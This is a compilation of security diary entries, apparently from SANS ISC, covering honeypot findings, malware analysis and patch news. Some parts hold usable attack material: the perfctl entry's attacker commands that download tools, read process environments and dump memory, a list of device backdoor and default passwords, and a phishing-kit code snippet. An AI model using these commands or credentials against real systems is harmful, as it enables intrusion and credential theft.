I noticed in my logs 2 weeks ago regular probe from a subnet in the Amazon cloud only scanning for TCP/8080 capture by the iptables of my DShield sensor. The scanning started on the 15 Aug - 4 Oct 2024 where the sensor recorded 1046 individual IPs from this network. 

The IP use the most was 15.184.38.31 that was initially recorded on the 15 Aug 2024 and the recorded almost daily between the 3 Sep - 4 Oct 2024. 

Since I have so much data about this single IP, the other thing I was curious about if the Time to Live (TTL) would be centered around the same cluster every time this source would be recorded. The data shows (picture below) shows it was consistently between ~85-118 with some outlier with a TTL of 193 indicating some packets started with a higher TTL. It seems unlikely these outliers would have started with a TTL of 255, that would be 62 hops away.

I picked the data from the 29 Sep 2024 to look at some of the inbound SYN packets for some clues and found the maximum segment size (MSS) wasn't the same for all traffic. Today, most traffic has a default MSS normally set to 1500, however, there can be exceptions.

The default TCP Maximum Segment Size in RFC 879 shows for IPv4 is 536. TTL 193 had a MSS of 536 set to the default which it isn't the norme but possible:

The TTL for all other traffic on the 29 Sep range between 80 to 110 and had an MSS of 1452:

Why 1452? Where is the missing 8 bytes? Point-to-Point Protocol over Ethernet (PPPoE) is one that needs those additional 8 bytes and truncates the Ethernet MTU to 1492 to route traffic between the host and the server. However, I have no way to confirm here if this is coming from a PPPoE or some other device but this is one possibility.
If you have a honeypot, packet capture [1] is always a friend and useful to see what the logs don’t capture.

[1] https://github.com/bruneaug/DShield-SIEM/blob/main/AddOn/packet_capture.md
[2] https://en.wikipedia.org/wiki/Maximum_segment_size
[3] https://datatracker.ietf.org/doc/html/rfc2516

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Our list of "Top" ssh usernames and password is pretty static. Well known defaults, like "root" and "admin" are at the top of the list. But there are always some usernames and password in the list that are not as well known, or only showed up more recently. I will focus in this diary on these "second tier" credentials.

345gs5662d34

Used by Polycom CX600 IP phones, this password often shows up in the username field (as other passwords do) if sloppy bots do enter it into the wrong field.

zyfwp

A backdoor account in Zyxel equipment. It was found by Rapid 7 (and later removed by Zyxel) in 2020.

yhtcAdmin

Used in "Youhua PT939G" fiber routers.

 vadmin

The default username for the web hosting platform LiteSpeed. Can be used via SSH or HTTP.

telecomadmin

The username used by Huawei ONT HG8245H5 fiber termination kit.

chenzilong

Not sure. But it may be a popular Chinese character. Maybe anybody reading this knows?

7ujMko0admin

Some Dahua network NVRs use this telnet/ssh password. They are pretending the string "7ujMko0" to the web password, which by default is "admin".

a1sev5y7c39k

The default password for some unspecified routers using the Realtek chipset.

Xpon@Olt9417#

V*SOL GPON OLT default password

ve0RbANG

used with the "YhtcAdmin" username for Youhua PT939G optical network termination equipment. The same device also uses Admin/1234 and Admin/Telecom_1234. .

You can look at our top password list here:

https://isc.sans.edu/data/ssh.html

I will add some of the details about our username and password pages as you look up a particular password. For example:

https://isc.sans.edu/ssh_usernames.html?username=345gs5662d34

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Demo scripts left behind after installing applications or frameworks are an ongoing problem. After installation, removing any "demo" or "example" folders is usually best. A few days ago, Ravindu Wickramasinghe noticed that the Angular-base64-upload project is leaving behind a demo folder with a script allowing arbitrary file uploads without authentication [1]. Exploitation of the vulnerability is trivial. An attacker may use the file upload script to upload a web shell, and in response, the attacker will obtain remote command execution with all the privileges granted to the web server.

Sadly, the project is also no longer maintained. But a patch is not needed. Removing the vulnerable script (and likely the entire demo folder) should be an appropriate response.

Shortly after the blog post's publication, we detected exploit attempts in our web honeypot logs. On October 14th, we saw about 3,000 scans for 

/angular-base64-upload/demo/server.php

Just note that requests for URLs containing "demo" are pretty standard. Interestingly, there was an increase in these requests starting in July.

Graph of requests containing the string "demo".

[1] https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

I receive a lot of spam in my catch-all mailboxes. If most of them are not interesting, some still attract my attention. Especially the one that I'll describe in this diary. The scenario is classic, an important document is pending delivery but... the victim needs to authenticate to get the precious! As you can see in the screenshot below, the phishing kit supports well-known service providers. 

But check carefully the URL: It starts with "blob:"! Usually, BLOBs are used to represent "Binary Large OBjects". In the context of a browser, an object URL[1] is a pseudo protocol to allow blob and file objects to be used as URL sources for things like images, download links for binary data, and so forth. It's part of the URL specification for handling binary data that needs to be referenced or accessed as an actual file, even if it doesn't exist as a physical file on a server.

In the context of this phishing kit, the attacker generated the landing page in a blob to remain stealthy. Let's have a look at the code:

function saveFile(name, type, data) {
    if (data != null && navigator.msSaveBlob)
        return navigator.msSaveBlob(new Blob([data], { type: type }), name);
    var a = $("<a style='display: none;'/>");
    var encodedStringAtoB = " ... [Base64-encode-data] ... "
    var decodedStringAtoB = atob(encodedStringAtoB);
    const myBlob = new Blob([decodedStringAtoB], { type: 'text/html' });
    const url = window.URL.createObjectURL(myBlob);
    a.attr("href", url);
    $("body").append(a);
    a[0].click();
    window.URL.revokeObjectURL(url);
    a.remove();
}

In JavaScript, you create a Blob with window.URL.createObjectURL(). 

Note that if you provided "valid" credentials, the phishing kit will ask you for more personal details:

Finally, the victim will get a fake document downloaded from hxxps://www[.]Mississauga[.]ca/wp-content/uploads/2021/01/14114418/EFT-Agreement-Form.pdf:

[1] https://en.wikipedia.org/wiki/Blob_URI_scheme

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Wireshark release 4.4.1 fixes 2 vulnerabilities and 27 bugs. One of these bugfixes is for the missing IP address plugin on Windows, see "Wireshark 4.4's IP Address Functions".

And there is a new feature in TShark:

"The TShark syntax for dumping only fields with a certain prefix has changed from -G fields prefix to -G fields,prefix. This allows tshark -G fields to again support also specifying the configuration profile to use."

Didier Stevens

Senior handler
blog.DidierStevens.com

A few days ago, a new stealthy malware targeting Linux hosts made a lot of noise: perfctl[1]. The malware has been pretty well analyzed and I won’t repeat what has been already disclosed. I found a copy of the "httpd" binary (SHA256:22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13)[2]. I dropped the malware in my lab to see how it detonated. I infected the lab without root privileges and detected the same behavior except files were not written to some locations due to a lack of access (not root). When executing without root privileges, the rootkit feature is unavailable and the malware runs "disclosed".

After the sandbox infection, I had two running processes:

• perfctl
• gnome-session-binary (This name can be different and mimic well-known Linux processes)

The resources used by the two processes are:

remnux@remnux:/$ sudo lsof -p 2637
COMMAND    PID   USER   FD      TYPE             DEVICE SIZE/OFF    NODE NAME
gnome-ses 2637 remnux  cwd       DIR                8,5     4096 1967470 /var/tmp/test
gnome-ses 2637 remnux  rtd       DIR                8,5     4096       2 /
gnome-ses 2637 remnux  txt       REG                8,5  9301499 2498448 /tmp/.perf.c/gnome-session-binary (deleted)
gnome-ses 2637 remnux  mem       REG                8,5 21444668  794483 /tmp/.xdiag/tordata/cached-microdescs
gnome-ses 2637 remnux  mem       REG                8,5     3552 2245832 /usr/share/zoneinfo/America/New_York
gnome-ses 2637 remnux    0r      CHR                1,3      0t0       6 /dev/null
gnome-ses 2637 remnux    1w      CHR                1,3      0t0       6 /dev/null
gnome-ses 2637 remnux    2w      CHR                1,3      0t0       6 /dev/null
gnome-ses 2637 remnux    3u     IPv4             186838      0t0     TCP remnux:44010->tor-exit-read-me.dfri.se:http (ESTABLISHED)
gnome-ses 2637 remnux    4u  a_inode               0,14        0   12517 [eventpoll]
gnome-ses 2637 remnux    5r     FIFO               0,13      0t0   58960 pipe
gnome-ses 2637 remnux    6w     FIFO               0,13      0t0   58960 pipe
gnome-ses 2637 remnux    7u     unix 0xffff8b2abaa0dc00      0t0   71705 type=STREAM
gnome-ses 2637 remnux    8u     unix 0xffff8b2abaa09800      0t0   58991 /tmp/.xdiag/int/.per.s type=STREAM
gnome-ses 2637 remnux    9u     unix 0xffff8b2abaa0e000      0t0   71704 type=STREAM
gnome-ses 2637 remnux   10u  a_inode               0,14        0   12517 [eventpoll]
gnome-ses 2637 remnux   11r     FIFO               0,13      0t0   71706 pipe
gnome-ses 2637 remnux   12w     FIFO               0,13      0t0   71706 pipe
gnome-ses 2637 remnux   13uW     REG                8,5        0  794471 /tmp/.xdiag/tordata/lock
gnome-ses 2637 remnux   14u     IPv4              68064      0t0     TCP localhost:37959 (LISTEN)
gnome-ses 2637 remnux   15u     IPv4              71708      0t0     TCP localhost:63582 (LISTEN)
gnome-ses 2637 remnux   16u     IPv4             187544      0t0     TCP localhost:44870->localhost:46606 (ESTABLISHED)
gnome-ses 2637 remnux   17u     IPv4             187546      0t0     TCP localhost:48816->localhost:63582 (ESTABLISHED)
gnome-ses 2637 remnux   18u     IPv4             187547      0t0     TCP localhost:63582->localhost:48816 (ESTABLISHED)
gnome-ses 2637 remnux   19u     IPv4              68080      0t0     TCP remnux:42126->tor-exit.exs.no:https (ESTABLISHED)
gnome-ses 2637 remnux   20r     FIFO               0,13      0t0  187612 pipe
gnome-ses 2637 remnux   21u     IPv4              71788      0t0     TCP localhost:44870 (LISTEN)
gnome-ses 2637 remnux   22u     IPv4              71790      0t0     TCP localhost:44869 (LISTEN)
gnome-ses 2637 remnux   23w     FIFO               0,13      0t0  187612 pipe
gnome-ses 2637 remnux   24r     FIFO               0,13      0t0  187613 pipe
gnome-ses 2637 remnux   25w     FIFO               0,13      0t0  187613 pipe

remnux@remnux:/$ sudo lsof -p 2791
COMMAND  PID   USER   FD      TYPE             DEVICE SIZE/OFF    NODE NAME
perfctl 2791 remnux  cwd       DIR                8,5     4096       2 /
perfctl 2791 remnux  rtd       DIR                8,5     4096       2 /
perfctl 2791 remnux  txt       REG                8,5  1727132 2498457 /tmp/.perf.c/perfctl
perfctl 2791 remnux    0r      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux    1w      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux    2w      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux    3u  a_inode               0,14        0   12517 [eventpoll]
perfctl 2791 remnux    4r     FIFO               0,13      0t0   68184 pipe
perfctl 2791 remnux    5w     FIFO               0,13      0t0   68184 pipe
perfctl 2791 remnux    6r     FIFO               0,13      0t0   71857 pipe
perfctl 2791 remnux    7u     unix 0xffff8b2abaa0dc00      0t0   71705 type=STREAM
perfctl 2791 remnux    8w     FIFO               0,13      0t0   71857 pipe
perfctl 2791 remnux    9u  a_inode               0,14        0   12517 [eventfd]
perfctl 2791 remnux   10u  a_inode               0,14        0   12517 [eventfd]
perfctl 2791 remnux   11u  a_inode               0,14        0   12517 [eventfd]
perfctl 2791 remnux   12r      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux   13u     IPv4             186859      0t0     TCP localhost:46606->localhost:44870 (ESTABLISHED)

That's exactly what has been described in the initial malware analysis: Tor is used for external communications and inter-process communications ate performed via sockets:

tor-exit-read-me.dfri.se:443 <-> (:42126) gnome-session-binary (127.0.0.1:46606) <-> (127.0.0.1:44870) perfctl

The malware also implants a backdoor allowing remote access to the Attacker.

Indeed, after approximately 30 minutes, I saw more activity ongoing. The Attacker dropped and executed a bunch of scripts to perform a footprint of the compromised host, search for interesting files/credentials, and exfiltrate them. All files were dropped in a sub-directory in the infected user's home directory:

remnux@remnux:~/.atmp/tmp/.applocal.xdiag$ ls -al
total 2752
drwx------  1 remnux  remnux   32768  8 Oct 14:34 .
drwx------  1 remnux  remnux   32768  8 Oct 10:03 ..
-rwx------  1 remnux  remnux      36  8 Oct 09:26 aa.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:06 cloud_meta.txt
-rwx------  1 remnux  remnux      64  8 Oct 09:26 debug.txt
drwx------  1 remnux  remnux   32768  8 Oct 09:07 docker
-rwx------  1 remnux  remnux    7745  8 Oct 09:24 environs.txt
-rwx------  1 remnux  remnux  208084  8 Oct 09:07 files.txt
drwx------  1 remnux  remnux   32768  8 Oct 09:20 files_other
drwx------  1 remnux  remnux   32768  8 Oct 09:20 files_th
-rwx------  1 remnux  remnux       0  8 Oct 09:13 foi.cry.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:13 foi.fds.txt
-rwx------  1 remnux  remnux     612  8 Oct 09:13 foi.fs.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:24 foi.varlib.txt
-rwx------  1 remnux  remnux   29994  8 Oct 09:24 foi.xy.txt
-rwx------  1 remnux  remnux   49776  8 Oct 09:06 host.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:06 i1run1dmen
-rwx------  1 remnux  remnux    6592  8 Oct 09:06 local_users.txt
-rwx------  1 remnux  remnux    2682  8 Oct 09:06 modules.txt
-rwx------  1 remnux  remnux    3705  8 Oct 09:06 net.txt
-rwx------  1 remnux  remnux  124006  8 Oct 09:24 process.env.txt
-rwx------  1 remnux  remnux   20141  8 Oct 09:24 process.mem.txt
-rwx------  1 remnux  remnux  470494  8 Oct 14:54 rex.filepaths.large-1.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:26 rver1
-rwx------  1 remnux  remnux    2370  8 Oct 09:08 th.filesystem.secrets.found.txt

To analyze the malware behavior, I used kunai[3] to record the system activity.

The main tool downloaded is TruffleHog[4], a well-known credentials scanner that can scan many different local or remote places. The file was downloaded from the official repository:

curl -m 1800 -fsSLk hxxps://github[.]com/trufflesecurity/trufflehog/releases/download/v3.78.2/trufflehog_3.78.2_linux_amd64.tar.gz -o th.tar.gz
tar zxvf th.tar.gz trufflehog
chmod +x trufflehog
./trufflehog --help
mv trufflehog thg
xargs -0 ./thg --concurrency=2 --no-update --no-verification --include-detectors=all filesystem
rm -f thg

I'm not sure if the scan was launched automatically or by a human: Why the TruffleHog binary was executed with the "--help" parameter? Strange.

Here is the result file:

remnux@remnux:~/.atmp/tmp/.applocal.xdiag$ cat th.filesystem.secrets.found.txt
Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://jschmoe:[email protected]:8000
File: /opt/procdot/plugins/pcap_tools/tcl/tcl8/http-2.8.7.tm
Line: 413

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://jschmoe:[email protected]:8000
File: /opt/procdot/plugins/pcap_tools/tcl/tcl8/http-2.8.7.tm
Line: 28

Found unverified result ???
Verification issue: More than one detector has found this result. For your safety, verification has been disabled.You can override this behavior by using the --allow-verification-overlap flag.
Detector Type: FTP
Decoder Type: PLAIN
Raw result: ftp://joe:[email protected]
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 105

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://joe:[email protected]
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 98

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://joe:[email protected]:3128
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 100

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://joe:[email protected]
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 98

Found unverified result ???
Detector Type: JDBC
Decoder Type: PLAIN
Raw result: jdbc:mysql://localhost/ziclix
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/dbexts.py
Line: 30

Found unverified result ???
Detector Type: JDBC
Decoder Type: PLAIN
Raw result: jdbc:postgresql://localhost:5432/ziclix
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/dbexts.py
Line: 38

Found unverified result ???
Detector Type: Github
Decoder Type: PLAIN
Raw result: 9813cde2db1f31f92fed49a4dd8aa29b21d72581
Rotation_guide: https://howtorotate.com/docs/tutorials/github/
Version: 1
File: /opt/ghidra/Ghidra/application.properties
Line: 10

Found unverified result ???
Detector Type: Github
Decoder Type: PLAIN
Raw result: 44ca5b263a955ba19ec4f57a5646d4a406a34f70
Rotation_guide: https://howtorotate.com/docs/tutorials/github/
Version: 1
File: /opt/ghidra/Ghidra/application.properties
Line: 11

The next step was to search for interesting files using a dictionary downloaded from the following URL:

curl -m 1800 -fsSLk hxxp://104[.]183[.]100[.]189/common/backup.list -o rex.filepaths.large-1.txt

The download file contains 19K+ regular expressions to match juicy files on a file system. Example:

...
/09-managing-state/end/vue-heroes/\.env$
/0-flannel\.conf$
/0\.htpasswd$
/0loginlog$
/10-flannel\.conf$
/1C/conf$
/1C/config$
/1confirmssr\.htm$
/1\.htpasswd$
/1loginlog$
/1password$
/2004conference$
/2009-conference$
/2015/kj/config\.js$
/2019/wp-login\.php$
/2020/wp-login\.php$
/2021/wp-login\.php$
/2loginlog$
/31_structure_tests/\.env$
/3digitcode\.php$
/3loginlog$
/3-sequelize/final/\.env$
...

The Attacker searched for many regular expressions and more in the list of discovered files. Then, he/she parsed also the /proc file system for interesting processes:

ls -l /proc/1327/exe
grep -s -q KMHt5Ykyq3ZkgI8CZ /proc/1327/cmdline
grep -s -q 5Y4B2Se2L4VPL6Z5nKMgIv5Ih3+oxkb5EqmzE768BFo= /proc/1327/cmdline
cat /proc/1327/environ
cat /proc/1327/cmdline
cat /proc/1327/maps

He/she also scrapped the processes' memory for interesting data by performing multiple dumps of the memory:

dd if=/proc/1327/mem bs=4096 iflag=skip_bytes,count_bytes skip=94423105585152 count=4096

Potential dockers were also inspected:

docker images
docker ps
docker ps -a

The malware replicated itself multiple times by creating new binaries:

cp /proc/62759/exe /tmp/.perf.c/ibus-x11
cp /proc/63602/exe /tmp/.perf.c/gnome-session-ctl
cp /proc/64431/exe /tmp/.perf.c/ibus-daemon
cp /proc/65271/exe /tmp/.perf.c/ibus-x11
cp /proc/6549/exe /tmp/.perf.c/pulseaudio
cp /proc/66088/exe /tmp/.perf.c/vmtoolsd
cp /proc/66919/exe /tmp/.perf.c/ibus-daemon
cp /proc/67754/exe /tmp/.perf.c/ibus-x11
cp /proc/68583/exe /tmp/.perf.c/jq
cp /proc/69428/exe /tmp/.perf.c/systemd
cp /proc/70242/exe /tmp/.perf.c/ssh-agent
cp /proc/71046/exe /tmp/.perf.c/python3
cp /proc/71062/exe /dev/shm/libfsnldev.so
cp /proc/71062/exe /dev/shm/libpprocps.so
cp /proc/71062/exe /lib/libfsnldev.so
cp /proc/71062/exe /lib/libpprocps.so
cp /proc/7411/exe /tmp/.perf.c/systemd
cp /proc/8248/exe /tmp/.perf.c/ibus-x11
cp /proc/9084/exe /tmp/.perf.c/ibus-x11
cp /proc/9914/exe /tmp/.perf.c/systemd

Once all details are collected, they are stored in a Tar archive and exfiltrated:

trunk.6f7794aa1bd1b2b8d26eb2eae5f8df37_169.155.242.252_.tar.gz

Conclusion: If just a "simple" cryptominer seems to be deployed by Attackers, they can also steal your data and probably abuse your compromised hosts in many different ways!

[1] https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/
[2] https://www.virustotal.com/gui/file/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
[3] https://isc.sans.edu/diary/Kunai+Keep+an+Eye+on+your+Linux+Hosts+Activity/31054
[4] https://github.com/trufflesecurity/trufflehog

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Microsoft today released patches for 117 vulnerabilities. Three additional vulnerabilities apply to Chromium/Edge. Another three vulnerabilities are rated critical.

Five of the vulnerabilities were disclosed before today. Two vulnerabilities were not only disclosed but also exploited, according to Microsoft

Notable Vulnerabilities:

Microsoft Management Console Remote Code Execution Vulnerability (CVE-2024-43572)

To Exploit this vulnerability, the attacker must convince the victim to open a malicious file.

Open Source Curl Remote Code Execution Vulnerability (CVE-2024-6197)

This vulnerability was disclosed and patched in libcurl back in July. Accordng to curl.se, the most likely outcome is a crash, but code execution can not be ruled out.

Windows Hyper-V Security Feature Bypass Vulnerability (CVE-2024-20659)

The vulnerability allows an attacker to bypass the UEFI on the host machine and compromise the hypervisor and the secure kernel. Exploitation requires a reboot at the right time.

Windows MSHTML Platform Spoofing Vulnerability (CVE-2024-43573)

yet another Windows MSHTML Platform Spoofing vulnerability. Fourth 0-day just this year in this component. APT actors usually use these issues to make downloading and executing malware more likely.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

It's always tempting to install the latest releases of your preferred software and operating systems. After all, that's the message we pass to our beloved users: "Patch, patch, and patch again!". Last week, I was teaching for SANS and decided to not upgrade my MacBook to macOS 15.0 (Sequoia). Today, I had nothing critical scheduled and made the big jump. Upgrading the operating system is always stressful but everything ran smoothly. So far so good...

Later, I started to do my regular geek tasks and connected to several SSH hosts. After a random amount of time, I noticed the following error for many connections:

ssh_dispatch_run_fatal: Connection to x.x.x.x port 22: Connection corrupted

This happened multiple times. I started to google for some users' feedback and experiences. It seems to be a problem faced by many people. What I've read:

• It happens randomly
• It affects IPv4 / IPv6
• Not related to an SSH client (term, iTerm2, same)
• People who upgraded to 15.0.1 have less frequent disconnections but the problem is not solved yet
• Some recommendations (worked for some users)
  • Disable the macOS firewall
  • Turn off "Limit IP address tracking
  • Disable private rotating MAC
  • Disable tools like LittleSnitch

There is no "magic recipe" to fix the issue. On my Mac, disabling the address tracking did the job. I've now an SSH session open for 2h+.

Many forums are covering this topic. The most complete one I found is on the Apple support forum[1]. In conclusion, if SSH is a critical protocol for you, maybe hold on before upgrading your macOS.

Tip: If you need to SSH to a host, be sure to start your shell in a "screen" (or Byobu, ... ) session[2] to not lose your work.

[1] https://discussions.apple.com/thread/255761702?sortBy=rank&page=1
[2] https://ss64.com/bash/screen.html

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

It is about a week since the release of the four CUPS remote code execution vulnerabilities. After the vulnerabilities became known, I configured one of our honeypots that watches a larger set of IPs to specifically collect UDP packets to port 631. Here is a quick summary of the results.

We do see plenty of scanning to enumerate vulnerable systems, but at this point, no evidence of actual exploitations. But the honeypot is not responding to these requests, so we may be missing post-recon attempts to exploit the vulnerability

Top URLs

http://192.34.63.88:5674/printers/securitytest3/

The website is down now, but used to show a message that this is a scan to evaluate systems for research purposes. We do no t have a prior history from this IP address.

http://194.113.74.187:631/printers/amongus

Also no longer responding. The IP address is associated with security researcher Bill Demirkapi.

http://80.94.95.85:65000/printers/YmVuaWduYmUK "location_field" "info_field"

The string at the end of the URL decoded to "benignbe". The IP address was first seen last August scanning for various ports. The URL is no longer responding.

http://34.176.139.243/printers/YmVuaWducHJpbnRlcnMK "location_field" "info_field"

Note the similar base64 encoded string. This one decoded to "benignprinters". 

http://t828r8qoegavzdeaqtn5jd9umlsdg34s.oastify.com/printers/research_cups_if_we_find_you_are_vulnerable_we_will_let_you_know_via_responsible_disclosure

The URL hopefully identifies the purpose of the scan correctly :) . Oastify.com is used by the Burp collaboration server.

http://172.214.128.90:65000/printers/YmVuaWduYmUK "location_field" "info_field"

Another "benignbe" URL. Interestingly a Microsoft/GitHub IP address.

http://87.236.176.146:631/classes/2ef46bd9-ae8f4743 (and similar URLs with varying random end)

This IP is associated with internet-measurement.com.

So far, I only saw two "ipp" URLs:

ipp://146.70.100.229:80/printers/ "XXlocation" "XXinfo" "XXmake-and-model"

and 

ipp://199.247.0.94:631/printers/test

I will try to setup some automated responses soon to get a bit more detail.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

[This is a Guest Diary by Joshua Gilman, an ISC intern as part of the SANS.edu BACS program]

Introduction

Setting up a DShield honeypot is just the beginning. The real challenge lies in configuring all the necessary post-installation settings, which can be tedious when deploying multiple honeypots. Drawing from personal experience and valuable feedback from past interns at the Internet Storm Center (ISC), I developed DShieldKickStarter to automate this often repetitive and time-consuming process.

What is DShieldKickStarter?

DShieldKickStarter is not a honeypot deployment tool. Instead, it’s a post-installation configuration script designed to streamline the setup of a honeypot environment after the DShield honeypot software has been installed. The script ensures that honeypots run efficiently with minimal manual effort by automating essential tasks such as setting up log backups, PCAP capture, and installing optional analysis tools.

Key Features of DShieldKickStarter

•    Automated Log Backups: The script organizes, compresses, and password-protects honeypot logs to prevent accidental execution of malicious files.
•    PCAP Capture Setup: Using tcpdump, it captures network traffic while excluding specific ports, ensuring relevant data is logged.
•    Optional Tool Installation: Cowrieprocessor and JSON-Log-Country are included as optional tools. Both were invaluable during my internship for streamlining data analysis.
•    Helpful for Multiple Honeypots: This script is handy when managing several honeypots. It saves time by automating repetitive setup tasks.

Step-by-Step Breakdown

The script automates several critical tasks:
1.    Creating Directories and Setting Permissions 
            Ensures the necessary directory structures for logs, backups, and PCAP data are in place, with proper permissions to secure sensitive files.
2.    Installing Required Packages 
             Installs essential tools such as tcpdump, git, and python3-pip, streamlining the log and packet capture setup.
3.    Configuring Log Rotation and Backups 
             Automatically rotates logs and stores them with password protection. PCAP files and honeypot logs are archived daily, and older backups are cleaned to save space.
4.    Automating PCAP Capture 
             Sets up tcpdump to capture network traffic, excluding predefined ports to ensure relevant data capture. The process is automated via cron jobs.
5.    Optional Tool Integration 
             The script optionally installs cowrieprocessor and JSON-Log-Country, two tools that were extremely helpful during my internship. These streamline log processing and help categorize attack data for further analysis.
6.    SCP Option for Off-Sensor Backup 
             If enabled, the script supports SCP transfers to a remote server, automating the secure transfer of backups for off-sensor storage.

Who Benefits from This?

•    ISC Handlers and Interns: This tool provides a streamlined process for post-installation setup, allowing for faster honeypot deployment and data collection.
•    Cybersecurity Professionals: This tool's time-saving features can benefit anyone interested in setting up a DShield honeypot and contributing to threat intelligence efforts.

Tool Showcase

1. CowrieProcessor

Description

CowrieProcessor is a Python tool designed to process and summarize Cowrie logs, allowing for more accessible and detailed analysis. Cowrie logs can contain overwhelming data as they track every interaction with the honeypot. CowrieProcessor condenses this data into a readable format, focusing on crucial elements like session details, IP addresses, commands entered by attackers, and malicious files downloaded during the session.

Usage and Benefits

The tool automates the parsing of Cowrie logs, providing a summary that includes key metrics such as session duration, attacker IPs, and the commands used during each attack. This is useful for quickly understanding attacker behavior without sifting through massive raw log files. With this, security teams can focus on actionable insights, such as blocking specific IPs or analyzing downloaded malware.

Screenshot Explanation

In the attached screenshot, CowrieProcessor provides a detailed view of a session from an attack on the honeypot. It shows session details, commands attempted by the attacker, and files downloaded, such as the malicious authorized_keys file. The easy-to-read output from CowrieProcessor highlights the attack flow, giving you insight into the malicious actor’s intentions.

CowrieProcessor output showing session details and malicious activities detected by the honeypot.

DShield SIEM (ELK)

Description

While DShield SIEM (ELK) is not included in the script, it is crucial in further analysis and data visualization for honeypots. ELK (Elastic Stack) enables the collection, processing, and real-time visualization of honeypot data. It provides a centralized platform to track attacker behavior, detect patterns, and generate insights through interactive dashboards.

Usage and Benefits

Using ELK, you can monitor key metrics such as the most frequent attacker IPs, session types, and the commands attackers use. ELK dashboards also provide the ability to create custom queries using Kibana Query Language (KQL), which allows you to filter logs by specific attributes like failed logins, session durations, or malicious file downloads.

ELK dashboard showing attack data, top IP addresses, session activity, and trends over time.

Screenshot Explanation

The attached screenshot shows a detailed ELK dashboard summarizing honeypot data. On the left side, the "Top 50 IP" table displays the most active attacking IPs, while the center pie charts break down the types of logs (honeypot, webhoneypot, etc.) and session activity. The bar chart on the right visualizes Cowrie activity over time, helping analysts track attack patterns. KQL can filter this data even further, focusing on specific attacks or malicious behaviors.

KQL (Kibana Query Language)

One of the standout features of ELK is the ability to leverage KQL for deep-dive investigations. For instance, if you want to search for all failed login attempts, you can use a KQL query like:
event.outcome: "login.failed"

This query will instantly filter your logs, allowing you to pinpoint where and when login attempts failed. Another useful query might be filtering by source IP to track all actions from a particular attacker:
source.ip: "45.148.10.242"

With KQL, you can quickly analyze data across large volumes of logs, making it easy to detect anomalies, potential threats, or patterns in attacker behavior.

[1] https://github.com/DShield-ISC/dshield
[2] https://github.com/iamjoshgilman/DShieldKickStarter
[3] https://github.com/jslagrew/cowrieprocessor
[4] https://github.com/justin-leibach/JSON-Log-Country
[5] https://github.com/bruneaug/DShield-SIEM
[6] https://www.elastic.co/guide/en/kibana/current/kuery-query.html
[7] https://www.sans.edu/cyber-security-programs/bachelors-degree/
-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Over the last 9 months or so, I've been putting together some docker containers that I find useful in my day-to-day malware analysis and forensicating. I have been putting them up on hub.docker.com and decided, I might as well let others know they were there. In a couple of cases, I just found it easier to create a docker container than try to remember to switch in and out of a Python virtualenv. In a couple of other cases, it avoids issues I've had with conflicting version of installed packages. In every case, I'm tracking new releases so I can update my containers when new releases come out and I usually do so within a couple of days of the new release. The ones that I have up at the moment are the following:

clausing/flare-floss

clausing/capa

clausing/hayabusa

clausing/takajo

clausing/chainsaw

clausing/yara

clausing/uac

clausing/dfir-unfurl

The USAGE portion of each page should give enough info on how to run thems (and what directories to map into the container). Hopefully, some of the rest of you will find these useful.

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

